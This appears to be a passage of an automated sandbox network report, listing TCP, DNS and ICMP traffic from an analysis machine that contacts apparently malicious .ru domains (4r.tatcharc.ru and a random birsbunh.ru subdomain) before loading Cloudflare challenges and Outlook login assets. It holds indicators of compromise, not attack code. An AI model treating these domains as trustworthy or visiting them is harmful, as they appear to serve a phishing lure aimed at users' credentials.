                                                                                                        Dec 18, 2024 18:51:23.066986084 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:23.067243099 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:23.067256927 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:23.125318050 CET44350036104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:51:23.125528097 CET44350036104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:51:23.125653982 CET50036443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:51:23.126526117 CET50036443192.168.2.7104.18.94.41
                                                                                                        Dec 18, 2024 18:51:23.126547098 CET44350036104.18.94.41192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.344635010 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.348872900 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:24.348886967 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.349975109 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.350060940 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:24.370445013 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:24.370584011 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.370666027 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:24.370678902 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:24.423804045 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.311569929 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.311698914 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.311769009 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.317563057 CET50038443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.317589998 CET44350038104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.509824991 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.509879112 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.509948969 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.510267019 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:25.510278940 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.616118908 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.616161108 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.616226912 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.616482019 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.616543055 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.616595984 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.617046118 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.617073059 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.617223024 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:25.617235899 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.740365028 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.740765095 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.740796089 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.741806030 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.741885900 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742265940 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742328882 CET44350039104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.742352009 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742352009 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742387056 CET50039443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742794037 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.742847919 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:26.742925882 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.743124008 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:26.743138075 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.715167999 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.715713978 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.715754986 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.716928005 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.716993093 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.717015982 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.717053890 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.717848063 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.718132019 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.718152046 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.718518019 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.718648911 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.718704939 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.718719006 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.719234943 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.719290972 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.719310045 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.719351053 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.720180035 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.720264912 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.760498047 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.760520935 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.760540009 CET4435004152.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.814240932 CET50041443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:27.964672089 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.965190887 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:27.965262890 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.966325045 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.966403008 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:27.967194080 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:27.967267990 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:27.967488050 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:27.967506886 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.015793085 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:28.220323086 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.220626116 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.220733881 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:28.221265078 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:28.221288919 CET4435004052.98.61.34192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.221298933 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:28.221338034 CET50040443192.168.2.752.98.61.34
                                                                                                        Dec 18, 2024 18:51:28.522432089 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:28.522480011 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.522542953 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:28.523121119 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:28.523139000 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:29.086117029 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:29.086245060 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:29.086410046 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:29.088041067 CET50042443192.168.2.7104.21.16.1
                                                                                                        Dec 18, 2024 18:51:29.088062048 CET44350042104.21.16.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.298147917 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.299072981 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.299110889 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.300185919 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.300257921 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.300268888 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.300307035 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.302412033 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.302481890 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.302697897 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.302705050 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.345808029 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.819452047 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.819680929 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.819744110 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.820873022 CET50043443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.820889950 CET4435004352.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.824098110 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.824131012 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:30.824202061 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.824419022 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:30.824430943 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:32.603014946 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:32.604942083 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:32.604967117 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:32.605437040 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:32.606107950 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:32.606184959 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:32.606612921 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:32.651325941 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:33.147109032 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:33.147151947 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:33.147217035 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:33.147229910 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:33.147269011 CET4435004452.98.200.242192.168.2.7
                                                                                                        Dec 18, 2024 18:51:33.147327900 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:33.150079966 CET50044443192.168.2.752.98.200.242
                                                                                                        Dec 18, 2024 18:51:33.150098085 CET4435004452.98.200.242192.168.2.7
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 18:48:38.926512957 CET123123192.168.2.740.81.94.65
                                                                                                        Dec 18, 2024 18:48:39.508737087 CET12312340.81.94.65192.168.2.7
                                                                                                        Dec 18, 2024 18:48:46.868995905 CET6094653192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:48:59.634732962 CET5654353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:48:59.635421991 CET4964053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:48:59.790110111 CET53636501.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:48:59.791480064 CET53652281.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:00.002140999 CET53565431.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:00.002365112 CET53496401.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:03.215930939 CET53561381.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:03.440614939 CET5643953192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:03.440834999 CET5956753192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:03.579211950 CET53595671.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:03.579448938 CET53564391.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.095988035 CET5620953192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.096148968 CET5796353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.096681118 CET6361453192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.096853971 CET5446953192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.097275972 CET5741453192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.097462893 CET6075753192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:04.234298944 CET53636141.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.234836102 CET53574141.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.234921932 CET53544691.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.235183001 CET53579631.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.241781950 CET53607571.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:04.323704958 CET53562091.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:06.505073071 CET6455753192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:06.505506992 CET6054053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:06.553812027 CET6093853192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:06.554009914 CET6023053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:06.647609949 CET53605401.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:06.648155928 CET53645571.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:06.691417933 CET53602301.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:06.694272995 CET53609381.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:07.939132929 CET6157553192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:07.939488888 CET4980353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:07.949517965 CET4952953192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:07.949775934 CET6425353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:08.093651056 CET53615751.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:08.099564075 CET53495291.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:08.099576950 CET53642531.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:08.127216101 CET53498031.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:12.283827066 CET53612891.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.135854006 CET5493553192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:13.136034012 CET5436553192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:49:13.281611919 CET53549351.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:13.281791925 CET53543651.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:20.211529970 CET53529681.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:32.898952961 CET138138192.168.2.7192.168.2.255
                                                                                                        Dec 18, 2024 18:49:39.015458107 CET53529021.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:49:59.367980957 CET53542821.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:50:01.771035910 CET53581901.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:50:31.781399012 CET53610701.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:17.609236002 CET53569421.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:19.348990917 CET5004853192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:19.350445032 CET6302053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:19.489595890 CET53630201.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:19.490988970 CET53500481.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:21.396137953 CET5882653192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:21.396307945 CET5309053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:21.798666954 CET53588261.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:21.798748970 CET53530901.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.340039015 CET4954453192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:25.340420008 CET5260353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:25.371076107 CET5590153192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:25.371216059 CET5173953192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:25.508951902 CET53559011.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.509275913 CET53517391.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.561530113 CET53495441.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:25.754863024 CET53526031.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.224463940 CET6540853192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:28.224633932 CET5130553192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:28.464842081 CET53654081.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:28.544567108 CET53513051.1.1.1192.168.2.7
                                                                                                        Dec 18, 2024 18:51:35.382075071 CET6181053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:35.382261038 CET6498353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:35.383981943 CET5526053192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:35.384264946 CET5428153192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:38.307912111 CET5189553192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:38.307960987 CET5209353192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:39.526098967 CET6487453192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:39.526256084 CET5392853192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:42.418056965 CET6217753192.168.2.71.1.1.1
                                                                                                        Dec 18, 2024 18:51:42.418337107 CET5980553192.168.2.71.1.1.1
                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Dec 18, 2024 18:49:08.127326012 CET192.168.2.71.1.1.1c23b(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 18:51:25.754931927 CET192.168.2.71.1.1.1c27c(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 18:51:28.545767069 CET192.168.2.71.1.1.1c25d(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 18:51:35.691674948 CET192.168.2.71.1.1.1c262(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 18:51:38.487672091 CET192.168.2.71.1.1.1c244(Port unreachable)Destination Unreachable
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 18:48:46.868995905 CET192.168.2.71.1.1.10x2f47Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:48:59.634732962 CET192.168.2.71.1.1.10x6752Standard query (0)4r.tatcharc.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:48:59.635421991 CET192.168.2.71.1.1.10x109eStandard query (0)4r.tatcharc.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:03.440614939 CET192.168.2.71.1.1.10x304aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:03.440834999 CET192.168.2.71.1.1.10x74b1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.095988035 CET192.168.2.71.1.1.10x16c8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.096148968 CET192.168.2.71.1.1.10xef10Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.096681118 CET192.168.2.71.1.1.10x2b8eStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.096853971 CET192.168.2.71.1.1.10xe0aaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.097275972 CET192.168.2.71.1.1.10x81b9Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.097462893 CET192.168.2.71.1.1.10xeeb9Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.505073071 CET192.168.2.71.1.1.10xbe4aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.505506992 CET192.168.2.71.1.1.10xcf41Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.553812027 CET192.168.2.71.1.1.10x695eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:06.554009914 CET192.168.2.71.1.1.10x8de0Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:07.939132929 CET192.168.2.71.1.1.10x86edStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:07.939488888 CET192.168.2.71.1.1.10x637fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:07.949517965 CET192.168.2.71.1.1.10x81bdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:07.949775934 CET192.168.2.71.1.1.10xf240Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:13.135854006 CET192.168.2.71.1.1.10xf815Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:13.136034012 CET192.168.2.71.1.1.10x29dfStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:19.348990917 CET192.168.2.71.1.1.10x39cdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:19.350445032 CET192.168.2.71.1.1.10x85c3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.396137953 CET192.168.2.71.1.1.10x98b4Standard query (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:21.396307945 CET192.168.2.71.1.1.10xe14fStandard query (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.340039015 CET192.168.2.71.1.1.10x9ffaStandard query (0)www.outlook.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.340420008 CET192.168.2.71.1.1.10xc300Standard query (0)www.outlook.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.371076107 CET192.168.2.71.1.1.10x9836Standard query (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:25.371216059 CET192.168.2.71.1.1.10x34adStandard query (0)kvbkbauzx0vyfgwmojnfccipm61yerioyjc3gynl5wjyfxpwmubhyata.birsbunh.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.224463940 CET192.168.2.71.1.1.10xb646Standard query (0)outlook.live.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:28.224633932 CET192.168.2.71.1.1.10x7523Standard query (0)outlook.live.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.382075071 CET192.168.2.71.1.1.10x78d2Standard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.382261038 CET192.168.2.71.1.1.10x41e1Standard query (0)assets.onestore.ms65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.383981943 CET192.168.2.71.1.1.10xdaa4Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:35.384264946 CET192.168.2.71.1.1.10x8af5Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:38.307912111 CET192.168.2.71.1.1.10xe328Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:38.307960987 CET192.168.2.71.1.1.10xac32Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:39.526098967 CET192.168.2.71.1.1.10xb503Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:39.526256084 CET192.168.2.71.1.1.10x6581Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:42.418056965 CET192.168.2.71.1.1.10xd375Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:51:42.418337107 CET192.168.2.71.1.1.10x7baaStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 18:48:47.007543087 CET1.1.1.1192.168.2.70x2f47No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:00.002140999 CET1.1.1.1192.168.2.70x6752No error (0)4r.tatcharc.ru172.67.153.247A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:00.002140999 CET1.1.1.1192.168.2.70x6752No error (0)4r.tatcharc.ru104.21.4.96A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:00.002365112 CET1.1.1.1192.168.2.70x109eNo error (0)4r.tatcharc.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:03.579211950 CET1.1.1.1192.168.2.70x74b1No error (0)www.google.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:03.579448938 CET1.1.1.1192.168.2.70x304aNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 18:49:04.178417921 CET1.1.1.1192.168.2.70x5a15No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
